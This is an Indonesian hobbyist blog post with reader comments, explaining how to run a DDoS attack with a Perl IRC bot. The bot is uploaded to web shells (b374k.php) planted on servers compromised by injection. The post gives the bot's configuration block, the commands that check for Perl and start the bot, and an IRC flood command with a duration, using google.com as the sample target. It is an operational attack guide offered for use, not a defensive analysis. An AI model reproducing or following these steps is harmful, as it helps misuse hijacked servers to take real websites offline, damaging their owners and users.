I'm Not Hacker Just Newbie: DDOS With Shell & Bot IRC
[ Search :

DDOS With Shell & Bot IRC

hay hay...kali ini saya mau nulis tentang DDOS ( Distributed Denial Of Service ),suatu tehnik yang mungkin menjadi momok di dunia cyber.Dengan melakukan DDOS seseorang yang memiliki banyak resource bandwith akan mampu membuat sebuah server yang dijadikan target Down sehingga tidak bisa di akses seperti kasus yang menimpa CNN,eBay,Yahoo,dll beberapa tahun yang lampau.Banyak cara melakukan DDOS,akan tetapi disini saya membahasnya menggunakan Bot IRC.
peralatan yang dibutuhkan:
  1. Shell hasil Injekkan 
  2. Channel IRC + IRC Client
  3. Script Bot ( saya menggunakan Perl )
saya anggap semuanya udah punya shell nya,kalau gak punya coba minta atau pinjem dari temen :-p,lalau edit dulu script nya di bagian ini:


##################### IRC #####################################################################
my @adms=("nama admin");                           # Administrator Nickname                      #####################################################################
my @canais=("#channel irc");                        # Channel ..if  password -> ("#channel :pass") #
###############################################################################################
my $nick='nick';                             # Nick prefix of the bot example :             #
                                               # vs[v7] = vs[v7]-718727                       #
###############################################################################################
my $ircname = 'bebas';                            # Identd of the bot                            #
###############################################################################################
chop (my $realname = `uname`);                 # Full Name                                    #
###############################################################################################
$servidor='server irc' unless $servidor;  # Server IRC of the bot                        #
###############################################################################################
my $porta='6667';                              # Server PORT         
lalu upload di shell yang udah disiapkan tadi
disini saya menggunakan shell b374k.php,di bagian command saya ketikkan perintah perl -v untuk mengecek apakah server tersebut terinstall active perl atau tidak...
ahai..terinstall rupanya,langsung saja kita ketikkan perintah perl namafile.pl  dan kita segera buka Mirc dan masuk ke channel yang udah kita set tadi
























bila bot udah masuk,langsung saja kita ketik perintah di irc !morgan @httpflood www.target.com time ,misal target saya google maka saya ketik !morgan @httpflood www.google.com 3600.
nb:3600=3600 detik
























hehehe...dengan kita memiliki banyak shell injekan,maka makin kokoh "pasukan" kita.Pesan saya jangan asal dar der dor...pikirkan juga efek dari tindakan kita.

5 komentar:

wiLMaR_kiDz mengatakan...

wewww...mayde, mayde, one down, one down...
makin cadas neh j0ck3r bro..
Like this Sob... :)

Anonim mengatakan...

gan cara buka shell nya gimana ya ???

lg bljr nih :D msih newbie

Unknown mengatakan...

ane masih ga ngerti :3 ,tutor video ada gak ? kalau ada kirim ke email ane :sirajluthfi007@gmail.com

Unknown mengatakan...

ane masih blom faham

Determination mengatakan...

dewa om :sungkem

Posting Komentar